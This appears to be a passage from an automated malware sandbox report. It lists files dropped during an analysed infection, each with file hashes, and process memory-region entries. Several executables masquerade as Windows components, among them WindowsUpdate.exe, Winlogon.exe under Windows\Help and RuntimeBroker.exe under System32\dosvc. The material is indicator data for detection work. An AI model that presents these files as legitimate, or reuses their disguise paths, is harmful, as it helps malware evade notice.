                                                                                                                                                                                              d987bd57582a22dfc65901ff256eda635dc8dad598c93b200002130b87fcfd97

                                                                                                                                                                                              SHA512

                                                                                                                                                                                              27a066b9d842acd7b1e0ca1dd045a9262b0d0a00c180eedeebeb9d3091925b184186fc3a1d2df28ae4c55626febe6abf6fdb5e26d45fd1a2968d57540e7cf29b

                                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\HD____11.19.exe
                                                                                                                                                                                              Filesize

                                                                                                                                                                                              14.3MB

                                                                                                                                                                                              MD5

                                                                                                                                                                                              b14120b6701d42147208ebf264ad9981

                                                                                                                                                                                              SHA1

                                                                                                                                                                                              f3cff7ac8e6c1671d2c3387648e54f80957196de

                                                                                                                                                                                              SHA256

                                                                                                                                                                                              d987bd57582a22dfc65901ff256eda635dc8dad598c93b200002130b87fcfd97

                                                                                                                                                                                              SHA512

                                                                                                                                                                                              27a066b9d842acd7b1e0ca1dd045a9262b0d0a00c180eedeebeb9d3091925b184186fc3a1d2df28ae4c55626febe6abf6fdb5e26d45fd1a2968d57540e7cf29b

                                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\Opus.exe
                                                                                                                                                                                              Filesize

                                                                                                                                                                                              203KB

                                                                                                                                                                                              MD5

                                                                                                                                                                                              759185ee3724d7563b709c888c696959

                                                                                                                                                                                              SHA1

                                                                                                                                                                                              7c166cc3cbfef08bb378bcf557b1f45396a22931

                                                                                                                                                                                              SHA256

                                                                                                                                                                                              9384798985672c356a8a41bf822443f8eb0d3747bfca148ce814594c1a894641

                                                                                                                                                                                              SHA512

                                                                                                                                                                                              ed754357b1b995de918af21fecd9d1464bdea6778f7ab450a34e3aae22ba7eebc02f2442af13774abfdf97954e419ec9e356b54506c7e3bf12e3b76ee882fa2c

                                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\Opus.exe
                                                                                                                                                                                              Filesize

                                                                                                                                                                                              203KB

                                                                                                                                                                                              MD5

                                                                                                                                                                                              759185ee3724d7563b709c888c696959

                                                                                                                                                                                              SHA1

                                                                                                                                                                                              7c166cc3cbfef08bb378bcf557b1f45396a22931

                                                                                                                                                                                              SHA256

                                                                                                                                                                                              9384798985672c356a8a41bf822443f8eb0d3747bfca148ce814594c1a894641

                                                                                                                                                                                              SHA512

                                                                                                                                                                                              ed754357b1b995de918af21fecd9d1464bdea6778f7ab450a34e3aae22ba7eebc02f2442af13774abfdf97954e419ec9e356b54506c7e3bf12e3b76ee882fa2c

                                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\Pluto Panel.exe
                                                                                                                                                                                              Filesize

                                                                                                                                                                                              892KB

                                                                                                                                                                                              MD5

                                                                                                                                                                                              ed666bf7f4a0766fcec0e9c8074b089b

                                                                                                                                                                                              SHA1

                                                                                                                                                                                              1b90f1a4cb6059d573fff115b3598604825d76e6

                                                                                                                                                                                              SHA256

                                                                                                                                                                                              d1330d349bfbd3aea545fa08ef63339e82a3f4d04e27216ecc4c45304f079264

                                                                                                                                                                                              SHA512

                                                                                                                                                                                              d0791eaa9859d751f946fd3252d2056c29328fc97e147a5234a52a3728588a3a1aaa003a8e32863d338ebdca92305c48b6fa12ca1e620cf27460bf091c3b6d49

                                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\Pluto Panel.exe
                                                                                                                                                                                              Filesize

                                                                                                                                                                                              892KB

                                                                                                                                                                                              MD5

                                                                                                                                                                                              ed666bf7f4a0766fcec0e9c8074b089b

                                                                                                                                                                                              SHA1

                                                                                                                                                                                              1b90f1a4cb6059d573fff115b3598604825d76e6

                                                                                                                                                                                              SHA256

                                                                                                                                                                                              d1330d349bfbd3aea545fa08ef63339e82a3f4d04e27216ecc4c45304f079264

                                                                                                                                                                                              SHA512

                                                                                                                                                                                              d0791eaa9859d751f946fd3252d2056c29328fc97e147a5234a52a3728588a3a1aaa003a8e32863d338ebdca92305c48b6fa12ca1e620cf27460bf091c3b6d49

                                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\WindowsUpdate.exe
                                                                                                                                                                                              Filesize

                                                                                                                                                                                              892KB

                                                                                                                                                                                              MD5

                                                                                                                                                                                              ed666bf7f4a0766fcec0e9c8074b089b

                                                                                                                                                                                              SHA1

                                                                                                                                                                                              1b90f1a4cb6059d573fff115b3598604825d76e6

                                                                                                                                                                                              SHA256

                                                                                                                                                                                              d1330d349bfbd3aea545fa08ef63339e82a3f4d04e27216ecc4c45304f079264

                                                                                                                                                                                              SHA512

                                                                                                                                                                                              d0791eaa9859d751f946fd3252d2056c29328fc97e147a5234a52a3728588a3a1aaa003a8e32863d338ebdca92305c48b6fa12ca1e620cf27460bf091c3b6d49

                                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\___11.19.exe
                                                                                                                                                                                              Filesize

                                                                                                                                                                                              15.6MB

                                                                                                                                                                                              MD5

                                                                                                                                                                                              a071727b72a8374ff79a695ecde32594

                                                                                                                                                                                              SHA1

                                                                                                                                                                                              b2aba60b3332d6b8f0a56cea310cdc2bdb4f9ffc

                                                                                                                                                                                              SHA256

                                                                                                                                                                                              8ecdfe60eacb5bf647ae69bcbc41dd727ea3089e92b4b08ebca3a8d162e50745

                                                                                                                                                                                              SHA512

                                                                                                                                                                                              854b93fb6b9bf0fe4caef5572935852ce8becf2bc7bd41b192a4b3cefb7854a2405c6c0c06bbdd4e1026ff9440ec753911dcc935fe68118e322614c1b918e400

                                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\___11.19.exe
                                                                                                                                                                                              Filesize

                                                                                                                                                                                              15.6MB

                                                                                                                                                                                              MD5

                                                                                                                                                                                              a071727b72a8374ff79a695ecde32594

                                                                                                                                                                                              SHA1

                                                                                                                                                                                              b2aba60b3332d6b8f0a56cea310cdc2bdb4f9ffc

                                                                                                                                                                                              SHA256

                                                                                                                                                                                              8ecdfe60eacb5bf647ae69bcbc41dd727ea3089e92b4b08ebca3a8d162e50745

                                                                                                                                                                                              SHA512

                                                                                                                                                                                              854b93fb6b9bf0fe4caef5572935852ce8becf2bc7bd41b192a4b3cefb7854a2405c6c0c06bbdd4e1026ff9440ec753911dcc935fe68118e322614c1b918e400

                                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\a.exe
                                                                                                                                                                                              Filesize

                                                                                                                                                                                              1.4MB

                                                                                                                                                                                              MD5

                                                                                                                                                                                              52cfd35f337ca837d31df0a95ce2a55e

                                                                                                                                                                                              SHA1

                                                                                                                                                                                              88eb919fa2761f739f02a025e4f9bf1fd340b6ff

                                                                                                                                                                                              SHA256

                                                                                                                                                                                              5975e737584ddf2601c02e5918a79dad7531df0e13dca922f0525f66bec4b448

                                                                                                                                                                                              SHA512

                                                                                                                                                                                              b584282f6f5396c3bbed7835be67420aa14d11b9c42a88b0e3413a07a6164c22d6f50d845d05f48cb95d84fd9545d0b9e25e581324a08b3a95ced9f048d41d73

                                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\a.exe
                                                                                                                                                                                              Filesize

                                                                                                                                                                                              1.4MB

                                                                                                                                                                                              MD5

                                                                                                                                                                                              52cfd35f337ca837d31df0a95ce2a55e

                                                                                                                                                                                              SHA1

                                                                                                                                                                                              88eb919fa2761f739f02a025e4f9bf1fd340b6ff

                                                                                                                                                                                              SHA256

                                                                                                                                                                                              5975e737584ddf2601c02e5918a79dad7531df0e13dca922f0525f66bec4b448

                                                                                                                                                                                              SHA512

                                                                                                                                                                                              b584282f6f5396c3bbed7835be67420aa14d11b9c42a88b0e3413a07a6164c22d6f50d845d05f48cb95d84fd9545d0b9e25e581324a08b3a95ced9f048d41d73

                                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\aaa.exe
                                                                                                                                                                                              Filesize

                                                                                                                                                                                              120KB

                                                                                                                                                                                              MD5

                                                                                                                                                                                              860aa57fc3578f7037bb27fc79b2a62c

                                                                                                                                                                                              SHA1

                                                                                                                                                                                              a14008fe5e1eb88bf46266de3d5ee5db2e0a722b

                                                                                                                                                                                              SHA256

                                                                                                                                                                                              5430565c4534b482c7216a0ae75d04e201ee0db0386682c0c010243083c28d29

                                                                                                                                                                                              SHA512

                                                                                                                                                                                              6639b3e2594e554c7fa811f22e1c514474d34220155b4c989ad8716db1a0aea65894aa23d78c12a4618c57312da00353a77dd8e6c6bdd927bf865f2e98aff8f1

                                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\aaa.exe
                                                                                                                                                                                              Filesize

                                                                                                                                                                                              120KB

                                                                                                                                                                                              MD5

                                                                                                                                                                                              860aa57fc3578f7037bb27fc79b2a62c

                                                                                                                                                                                              SHA1

                                                                                                                                                                                              a14008fe5e1eb88bf46266de3d5ee5db2e0a722b

                                                                                                                                                                                              SHA256

                                                                                                                                                                                              5430565c4534b482c7216a0ae75d04e201ee0db0386682c0c010243083c28d29

                                                                                                                                                                                              SHA512

                                                                                                                                                                                              6639b3e2594e554c7fa811f22e1c514474d34220155b4c989ad8716db1a0aea65894aa23d78c12a4618c57312da00353a77dd8e6c6bdd927bf865f2e98aff8f1

                                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\aaa.exe
                                                                                                                                                                                              Filesize

                                                                                                                                                                                              120KB

                                                                                                                                                                                              MD5

                                                                                                                                                                                              860aa57fc3578f7037bb27fc79b2a62c

                                                                                                                                                                                              SHA1

                                                                                                                                                                                              a14008fe5e1eb88bf46266de3d5ee5db2e0a722b

                                                                                                                                                                                              SHA256

                                                                                                                                                                                              5430565c4534b482c7216a0ae75d04e201ee0db0386682c0c010243083c28d29

                                                                                                                                                                                              SHA512

                                                                                                                                                                                              6639b3e2594e554c7fa811f22e1c514474d34220155b4c989ad8716db1a0aea65894aa23d78c12a4618c57312da00353a77dd8e6c6bdd927bf865f2e98aff8f1

                                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\gay.exe
                                                                                                                                                                                              Filesize

                                                                                                                                                                                              37KB

                                                                                                                                                                                              MD5

                                                                                                                                                                                              8eedc01c11b251481dec59e5308dccc3

                                                                                                                                                                                              SHA1

                                                                                                                                                                                              24bf069e9f2a1f12aefa391674ed82059386b0aa

                                                                                                                                                                                              SHA256

                                                                                                                                                                                              0184983a425fef55d46b7e0eb729a245730ee26414ebe4b155917c0124a19c2d

                                                                                                                                                                                              SHA512

                                                                                                                                                                                              52388313b21f14aa69c8b37e0fe0b73f66aa92f08651a16c820aae65d341dc1af6b48f3c8d4f657ac990eeaf4b9a01ae769bca4d3625550011708697d22b69cc

                                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\gay.exe
                                                                                                                                                                                              Filesize

                                                                                                                                                                                              37KB

                                                                                                                                                                                              MD5

                                                                                                                                                                                              8eedc01c11b251481dec59e5308dccc3

                                                                                                                                                                                              SHA1

                                                                                                                                                                                              24bf069e9f2a1f12aefa391674ed82059386b0aa

                                                                                                                                                                                              SHA256

                                                                                                                                                                                              0184983a425fef55d46b7e0eb729a245730ee26414ebe4b155917c0124a19c2d

                                                                                                                                                                                              SHA512

                                                                                                                                                                                              52388313b21f14aa69c8b37e0fe0b73f66aa92f08651a16c820aae65d341dc1af6b48f3c8d4f657ac990eeaf4b9a01ae769bca4d3625550011708697d22b69cc

                                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\healastounding.exe
                                                                                                                                                                                              Filesize

                                                                                                                                                                                              3.6MB

                                                                                                                                                                                              MD5

                                                                                                                                                                                              6fb798f1090448ce26299c2b35acf876

                                                                                                                                                                                              SHA1

                                                                                                                                                                                              451423d5690cffa02741d5da6e7c45bc08aefb55

                                                                                                                                                                                              SHA256

                                                                                                                                                                                              b4f86ff48c5f6b01e0ad4543fb78e0435e81f3ec2aaca89866862157c0dacf4f

                                                                                                                                                                                              SHA512

                                                                                                                                                                                              9cc2421a2f3ab01d15be62a848947b03f1a8212cfd923573cf70f8c10bd8d124aee3b251828834236af291ea12450ac2580a712e53a022ce11b4d71b0357d8c3

                                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\healastounding.exe
                                                                                                                                                                                              Filesize

                                                                                                                                                                                              3.6MB

                                                                                                                                                                                              MD5

                                                                                                                                                                                              6fb798f1090448ce26299c2b35acf876

                                                                                                                                                                                              SHA1

                                                                                                                                                                                              451423d5690cffa02741d5da6e7c45bc08aefb55

                                                                                                                                                                                              SHA256

                                                                                                                                                                                              b4f86ff48c5f6b01e0ad4543fb78e0435e81f3ec2aaca89866862157c0dacf4f

                                                                                                                                                                                              SHA512

                                                                                                                                                                                              9cc2421a2f3ab01d15be62a848947b03f1a8212cfd923573cf70f8c10bd8d124aee3b251828834236af291ea12450ac2580a712e53a022ce11b4d71b0357d8c3

                                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\mediaget.exe
                                                                                                                                                                                              Filesize

                                                                                                                                                                                              37KB

                                                                                                                                                                                              MD5

                                                                                                                                                                                              8eedc01c11b251481dec59e5308dccc3

                                                                                                                                                                                              SHA1

                                                                                                                                                                                              24bf069e9f2a1f12aefa391674ed82059386b0aa

                                                                                                                                                                                              SHA256

                                                                                                                                                                                              0184983a425fef55d46b7e0eb729a245730ee26414ebe4b155917c0124a19c2d

                                                                                                                                                                                              SHA512

                                                                                                                                                                                              52388313b21f14aa69c8b37e0fe0b73f66aa92f08651a16c820aae65d341dc1af6b48f3c8d4f657ac990eeaf4b9a01ae769bca4d3625550011708697d22b69cc

                                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\mediaget.exe
                                                                                                                                                                                              Filesize

                                                                                                                                                                                              37KB

                                                                                                                                                                                              MD5

                                                                                                                                                                                              8eedc01c11b251481dec59e5308dccc3

                                                                                                                                                                                              SHA1

                                                                                                                                                                                              24bf069e9f2a1f12aefa391674ed82059386b0aa

                                                                                                                                                                                              SHA256

                                                                                                                                                                                              0184983a425fef55d46b7e0eb729a245730ee26414ebe4b155917c0124a19c2d

                                                                                                                                                                                              SHA512

                                                                                                                                                                                              52388313b21f14aa69c8b37e0fe0b73f66aa92f08651a16c820aae65d341dc1af6b48f3c8d4f657ac990eeaf4b9a01ae769bca4d3625550011708697d22b69cc

                                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\test.exe
                                                                                                                                                                                              Filesize

                                                                                                                                                                                              45KB

                                                                                                                                                                                              MD5

                                                                                                                                                                                              7e50b292982932190179245c60c0b59b

                                                                                                                                                                                              SHA1

                                                                                                                                                                                              25cf641ddcdc818f32837db236a58060426b5571

                                                                                                                                                                                              SHA256

                                                                                                                                                                                              a8dde4e60db080dfc397d7e312e7e9f18d9c08d6088e8043feeae9ab32abdbb8

                                                                                                                                                                                              SHA512

                                                                                                                                                                                              c6d422d9fb115e1b6b085285b1d3ca46ed541e390895d702710e82a336f4de6cc5c9183f8e6ebe35475fcce6def8cc5ffa8ee4a61b38d7e80a9f40789688b885

                                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\test.exe
                                                                                                                                                                                              Filesize

                                                                                                                                                                                              45KB

                                                                                                                                                                                              MD5

                                                                                                                                                                                              7e50b292982932190179245c60c0b59b

                                                                                                                                                                                              SHA1

                                                                                                                                                                                              25cf641ddcdc818f32837db236a58060426b5571

                                                                                                                                                                                              SHA256

                                                                                                                                                                                              a8dde4e60db080dfc397d7e312e7e9f18d9c08d6088e8043feeae9ab32abdbb8

                                                                                                                                                                                              SHA512

                                                                                                                                                                                              c6d422d9fb115e1b6b085285b1d3ca46ed541e390895d702710e82a336f4de6cc5c9183f8e6ebe35475fcce6def8cc5ffa8ee4a61b38d7e80a9f40789688b885

                                                                                                                                                                                            • C:\Users\Public\Downloads\System.exe
                                                                                                                                                                                              Filesize

                                                                                                                                                                                              564KB

                                                                                                                                                                                              MD5

                                                                                                                                                                                              748a4bea8c0624a4c7a69f67263e0839

                                                                                                                                                                                              SHA1

                                                                                                                                                                                              6955b7d516df38992ac6bff9d0b0f5df150df859

                                                                                                                                                                                              SHA256

                                                                                                                                                                                              220d8f8ff82d413c81bd02dfa001e1c478e8fbea44bad24f21b3a5284e15632e

                                                                                                                                                                                              SHA512

                                                                                                                                                                                              5fcdfddce3cc2e636001ed08c5f2f7590aadaa37c091f7ba94e519d298e284362721f1859c6ffbf064ae23e05d4e0e9754b515396812fbe9f9028497396799fd

                                                                                                                                                                                            • C:\Windows\Help\Winlogon.exe
                                                                                                                                                                                              Filesize

                                                                                                                                                                                              74KB

                                                                                                                                                                                              MD5

                                                                                                                                                                                              a8ddace9435fe395325fc45dde8bd0a3

                                                                                                                                                                                              SHA1

                                                                                                                                                                                              dcf9baaa9e3a27450debf4f35112376ed005c800

                                                                                                                                                                                              SHA256

                                                                                                                                                                                              6e81d7c71b3e8d731e11ad75d3dac02a4210c9f90fac618af5c00cbce3718658

                                                                                                                                                                                              SHA512

                                                                                                                                                                                              2c6006e42ecf31da02a4584e69c0e55390be5a405353307582852728b2ceb65033f3f5cd0b6465b3a1541d19eab95c61b394e3403dee558196c2f2969d82b196

                                                                                                                                                                                            • C:\Windows\SysWOW64\240568984.txt
                                                                                                                                                                                              Filesize

                                                                                                                                                                                              50KB

                                                                                                                                                                                              MD5

                                                                                                                                                                                              8f5f2a3c5dc64d93c3e6ace30d7c3ead

                                                                                                                                                                                              SHA1

                                                                                                                                                                                              e0bcf1b84a66b048dd3404ce9bd3c5043089d730

                                                                                                                                                                                              SHA256

                                                                                                                                                                                              15e378b3b9f8b710211318ad2f72c05e8a35415981dff3ed26dd7985f0738360

                                                                                                                                                                                              SHA512

                                                                                                                                                                                              648e971e954158e5f359154af35938f7bf1a877395329d1a481dbfdb518342319fdbd0b9cfc86e9aaf10c23c7428d7ecb63e6ac0a5c690e9992ee51f095d11b4

                                                                                                                                                                                            • C:\Windows\SysWOW64\240568984.txt
                                                                                                                                                                                              Filesize

                                                                                                                                                                                              50KB

                                                                                                                                                                                              MD5

                                                                                                                                                                                              8f5f2a3c5dc64d93c3e6ace30d7c3ead

                                                                                                                                                                                              SHA1

                                                                                                                                                                                              e0bcf1b84a66b048dd3404ce9bd3c5043089d730

                                                                                                                                                                                              SHA256

                                                                                                                                                                                              15e378b3b9f8b710211318ad2f72c05e8a35415981dff3ed26dd7985f0738360

                                                                                                                                                                                              SHA512

                                                                                                                                                                                              648e971e954158e5f359154af35938f7bf1a877395329d1a481dbfdb518342319fdbd0b9cfc86e9aaf10c23c7428d7ecb63e6ac0a5c690e9992ee51f095d11b4

                                                                                                                                                                                            • C:\Windows\SysWOW64\240568984.txt
                                                                                                                                                                                              Filesize

                                                                                                                                                                                              50KB

                                                                                                                                                                                              MD5

                                                                                                                                                                                              8f5f2a3c5dc64d93c3e6ace30d7c3ead

                                                                                                                                                                                              SHA1

                                                                                                                                                                                              e0bcf1b84a66b048dd3404ce9bd3c5043089d730

                                                                                                                                                                                              SHA256

                                                                                                                                                                                              15e378b3b9f8b710211318ad2f72c05e8a35415981dff3ed26dd7985f0738360

                                                                                                                                                                                              SHA512

                                                                                                                                                                                              648e971e954158e5f359154af35938f7bf1a877395329d1a481dbfdb518342319fdbd0b9cfc86e9aaf10c23c7428d7ecb63e6ac0a5c690e9992ee51f095d11b4

                                                                                                                                                                                            • C:\Windows\SysWOW64\TXPlatforn.exe
                                                                                                                                                                                              Filesize

                                                                                                                                                                                              377KB

                                                                                                                                                                                              MD5

                                                                                                                                                                                              a4329177954d4104005bce3020e5ef59

                                                                                                                                                                                              SHA1

                                                                                                                                                                                              23c29e295e2dbb8454012d619ca3f81e4c16e85a

                                                                                                                                                                                              SHA256

                                                                                                                                                                                              6156d003d54dcf2ee92f21bd6e7a6a7f91730bd2804381260bcabe465abe6ddd

                                                                                                                                                                                              SHA512

                                                                                                                                                                                              81e9d456a4abfc7cd9e0943d4a0ce15523362c3179f3368381d1d7974f80a9f9113b5404b96e67e91684e0ea1895b7d0073e4c48d0bfc4fd0244b1af6acf0208

                                                                                                                                                                                            • C:\Windows\SysWOW64\TXPlatforn.exe
                                                                                                                                                                                              Filesize

                                                                                                                                                                                              377KB

                                                                                                                                                                                              MD5

                                                                                                                                                                                              a4329177954d4104005bce3020e5ef59

                                                                                                                                                                                              SHA1

                                                                                                                                                                                              23c29e295e2dbb8454012d619ca3f81e4c16e85a

                                                                                                                                                                                              SHA256

                                                                                                                                                                                              6156d003d54dcf2ee92f21bd6e7a6a7f91730bd2804381260bcabe465abe6ddd

                                                                                                                                                                                              SHA512

                                                                                                                                                                                              81e9d456a4abfc7cd9e0943d4a0ce15523362c3179f3368381d1d7974f80a9f9113b5404b96e67e91684e0ea1895b7d0073e4c48d0bfc4fd0244b1af6acf0208

                                                                                                                                                                                            • C:\Windows\SysWOW64\TXPlatforn.exe
                                                                                                                                                                                              Filesize

                                                                                                                                                                                              377KB

                                                                                                                                                                                              MD5

                                                                                                                                                                                              a4329177954d4104005bce3020e5ef59

                                                                                                                                                                                              SHA1

                                                                                                                                                                                              23c29e295e2dbb8454012d619ca3f81e4c16e85a

                                                                                                                                                                                              SHA256

                                                                                                                                                                                              6156d003d54dcf2ee92f21bd6e7a6a7f91730bd2804381260bcabe465abe6ddd

                                                                                                                                                                                              SHA512

                                                                                                                                                                                              81e9d456a4abfc7cd9e0943d4a0ce15523362c3179f3368381d1d7974f80a9f9113b5404b96e67e91684e0ea1895b7d0073e4c48d0bfc4fd0244b1af6acf0208

                                                                                                                                                                                            • C:\Windows\SysWOW64\Ö÷¶¯·ÀÓù·þÎñÄ£¿é.exe
                                                                                                                                                                                              Filesize

                                                                                                                                                                                              60KB

                                                                                                                                                                                              MD5

                                                                                                                                                                                              889b99c52a60dd49227c5e485a016679

                                                                                                                                                                                              SHA1

                                                                                                                                                                                              8fa889e456aa646a4d0a4349977430ce5fa5e2d7

                                                                                                                                                                                              SHA256

                                                                                                                                                                                              6cbe0e1f046b13b29bfa26f8b368281d2dda7eb9b718651d5856f22cc3e02910

                                                                                                                                                                                              SHA512

                                                                                                                                                                                              08933106eaf338dd119c45cbf1f83e723aff77cc0f8d3fc84e36253b1eb31557a54211d1d5d1cb58958188e32064d451f6c66a24b3963cccd3de07299ab90641

                                                                                                                                                                                            • C:\Windows\SysWOW64\Ö÷¶¯·ÀÓù·þÎñÄ£¿é.exe
                                                                                                                                                                                              Filesize

                                                                                                                                                                                              60KB

                                                                                                                                                                                              MD5

                                                                                                                                                                                              889b99c52a60dd49227c5e485a016679

                                                                                                                                                                                              SHA1

                                                                                                                                                                                              8fa889e456aa646a4d0a4349977430ce5fa5e2d7

                                                                                                                                                                                              SHA256

                                                                                                                                                                                              6cbe0e1f046b13b29bfa26f8b368281d2dda7eb9b718651d5856f22cc3e02910

                                                                                                                                                                                              SHA512

                                                                                                                                                                                              08933106eaf338dd119c45cbf1f83e723aff77cc0f8d3fc84e36253b1eb31557a54211d1d5d1cb58958188e32064d451f6c66a24b3963cccd3de07299ab90641

                                                                                                                                                                                            • C:\Windows\System32\WUDFx02000\dwm.exe
                                                                                                                                                                                              Filesize

                                                                                                                                                                                              564KB

                                                                                                                                                                                              MD5

                                                                                                                                                                                              748a4bea8c0624a4c7a69f67263e0839

                                                                                                                                                                                              SHA1

                                                                                                                                                                                              6955b7d516df38992ac6bff9d0b0f5df150df859

                                                                                                                                                                                              SHA256

                                                                                                                                                                                              220d8f8ff82d413c81bd02dfa001e1c478e8fbea44bad24f21b3a5284e15632e

                                                                                                                                                                                              SHA512

                                                                                                                                                                                              5fcdfddce3cc2e636001ed08c5f2f7590aadaa37c091f7ba94e519d298e284362721f1859c6ffbf064ae23e05d4e0e9754b515396812fbe9f9028497396799fd

                                                                                                                                                                                            • C:\Windows\System32\dosvc\RuntimeBroker.exe
                                                                                                                                                                                              Filesize

                                                                                                                                                                                              564KB

                                                                                                                                                                                              MD5

                                                                                                                                                                                              748a4bea8c0624a4c7a69f67263e0839

                                                                                                                                                                                              SHA1

                                                                                                                                                                                              6955b7d516df38992ac6bff9d0b0f5df150df859

                                                                                                                                                                                              SHA256

                                                                                                                                                                                              220d8f8ff82d413c81bd02dfa001e1c478e8fbea44bad24f21b3a5284e15632e

                                                                                                                                                                                              SHA512

                                                                                                                                                                                              5fcdfddce3cc2e636001ed08c5f2f7590aadaa37c091f7ba94e519d298e284362721f1859c6ffbf064ae23e05d4e0e9754b515396812fbe9f9028497396799fd

                                                                                                                                                                                            • C:\Windows\System32\dosvc\RuntimeBroker.exe
                                                                                                                                                                                              Filesize

                                                                                                                                                                                              564KB

                                                                                                                                                                                              MD5

                                                                                                                                                                                              748a4bea8c0624a4c7a69f67263e0839

                                                                                                                                                                                              SHA1

                                                                                                                                                                                              6955b7d516df38992ac6bff9d0b0f5df150df859

                                                                                                                                                                                              SHA256

                                                                                                                                                                                              220d8f8ff82d413c81bd02dfa001e1c478e8fbea44bad24f21b3a5284e15632e

                                                                                                                                                                                              SHA512

                                                                                                                                                                                              5fcdfddce3cc2e636001ed08c5f2f7590aadaa37c091f7ba94e519d298e284362721f1859c6ffbf064ae23e05d4e0e9754b515396812fbe9f9028497396799fd

                                                                                                                                                                                            • C:\Windows\Temp\Crashpad\reports\sppsvc.exe
                                                                                                                                                                                              Filesize

                                                                                                                                                                                              564KB

                                                                                                                                                                                              MD5

                                                                                                                                                                                              748a4bea8c0624a4c7a69f67263e0839

                                                                                                                                                                                              SHA1

                                                                                                                                                                                              6955b7d516df38992ac6bff9d0b0f5df150df859

                                                                                                                                                                                              SHA256

                                                                                                                                                                                              220d8f8ff82d413c81bd02dfa001e1c478e8fbea44bad24f21b3a5284e15632e

                                                                                                                                                                                              SHA512

                                                                                                                                                                                              5fcdfddce3cc2e636001ed08c5f2f7590aadaa37c091f7ba94e519d298e284362721f1859c6ffbf064ae23e05d4e0e9754b515396812fbe9f9028497396799fd

                                                                                                                                                                                            • \??\c:\windows\SysWOW64\240568984.txt
                                                                                                                                                                                              Filesize

                                                                                                                                                                                              50KB

                                                                                                                                                                                              MD5

                                                                                                                                                                                              8f5f2a3c5dc64d93c3e6ace30d7c3ead

                                                                                                                                                                                              SHA1

                                                                                                                                                                                              e0bcf1b84a66b048dd3404ce9bd3c5043089d730

                                                                                                                                                                                              SHA256

                                                                                                                                                                                              15e378b3b9f8b710211318ad2f72c05e8a35415981dff3ed26dd7985f0738360

                                                                                                                                                                                              SHA512

                                                                                                                                                                                              648e971e954158e5f359154af35938f7bf1a877395329d1a481dbfdb518342319fdbd0b9cfc86e9aaf10c23c7428d7ecb63e6ac0a5c690e9992ee51f095d11b4

                                                                                                                                                                                            • memory/228-246-0x0000000074F30000-0x00000000754E1000-memory.dmp
                                                                                                                                                                                              Filesize

                                                                                                                                                                                              5.7MB

                                                                                                                                                                                            • memory/228-242-0x0000000000000000-mapping.dmp
                                                                                                                                                                                            • memory/548-188-0x0000000000000000-mapping.dmp
                                                                                                                                                                                            • memory/552-363-0x0000000000D00000-0x0000000000D60000-memory.dmp
                                                                                                                                                                                              Filesize

                                                                                                                                                                                              384KB

                                                                                                                                                                                            • memory/552-364-0x0000000000400000-0x00000000007C2000-memory.dmp
                                                                                                                                                                                              Filesize

                                                                                                                                                                                              3.8MB

                                                                                                                                                                                            • memory/552-362-0x0000000000400000-0x00000000007C2000-memory.dmp
                                                                                                                                                                                              Filesize

                                                                                                                                                                                              3.8MB

                                                                                                                                                                                            • memory/684-134-0x0000000000000000-mapping.dmp
                                                                                                                                                                                            • memory/684-162-0x0000000074F30000-0x00000000754E1000-memory.dmp
                                                                                                                                                                                              Filesize

                                                                                                                                                                                              5.7MB

                                                                                                                                                                                            • memory/884-352-0x0000020B53840000-0x0000020B53850000-memory.dmp
                                                                                                                                                                                              Filesize

                                                                                                                                                                                              64KB

                                                                                                                                                                                            • memory/884-351-0x0000020B53830000-0x0000020B53840000-memory.dmp
                                                                                                                                                                                              Filesize

                                                                                                                                                                                              64KB

                                                                                                                                                                                            • memory/884-341-0x0000020B53810000-0x0000020B53820000-memory.dmp
                                                                                                                                                                                              Filesize

                                                                                                                                                                                              64KB

                                                                                                                                                                                            • memory/884-353-0x0000020B53850000-0x0000020B53860000-memory.dmp
                                                                                                                                                                                              Filesize

                                                                                                                                                                                              64KB

                                                                                                                                                                                            • memory/884-340-0x0000000000000000-mapping.dmp
                                                                                                                                                                                            • memory/1192-145-0x0000000000000000-mapping.dmp
                                                                                                                                                                                            • memory/1192-171-0x0000000074F30000-0x00000000754E1000-memory.dmp
                                                                                                                                                                                              Filesize

                                                                                                                                                                                              5.7MB

                                                                                                                                                                                            • memory/1584-331-0x0000000000000000-mapping.dmp
                                                                                                                                                                                            • memory/1620-155-0x0000000000D30000-0x0000000000D42000-memory.dmp
                                                                                                                                                                                              Filesize

                                                                                                                                                                                              72KB

                                                                                                                                                                                            • memory/1620-141-0x0000000000000000-mapping.dmp
                                                                                                                                                                                            • memory/1636-241-0x0000000010000000-0x00000000101B6000-memory.dmp
                                                                                                                                                                                              Filesize

                                                                                                                                                                                              1.7MB

                                                                                                                                                                                            • memory/1636-220-0x0000000000000000-mapping.dmp
                                                                                                                                                                                            • memory/1708-355-0x0000000000400000-0x00000000004DF000-memory.dmp
                                                                                                                                                                                              Filesize

                                                                                                                                                                                              892KB

                                                                                                                                                                                            • memory/1708-358-0x0000000000400000-0x00000000004DF000-memory.dmp
                                                                                                                                                                                              Filesize

                                                                                                                                                                                              892KB

                                                                                                                                                                                            • memory/1708-131-0x0000000000000000-mapping.dmp
                                                                                                                                                                                            • memory/1708-354-0x0000000000000000-mapping.dmp
                                                                                                                                                                                            • memory/1708-135-0x0000000074F30000-0x00000000754E1000-memory.dmp
                                                                                                                                                                                              Filesize

                                                                                                                                                                                              5.7MB

                                                                                                                                                                                            • memory/1728-166-0x0000000074F30000-0x00000000754E1000-memory.dmp
                                                                                                                                                                                              Filesize

                                                                                                                                                                                              5.7MB

                                                                                                                                                                                            • memory/1728-152-0x0000000000000000-mapping.dmp
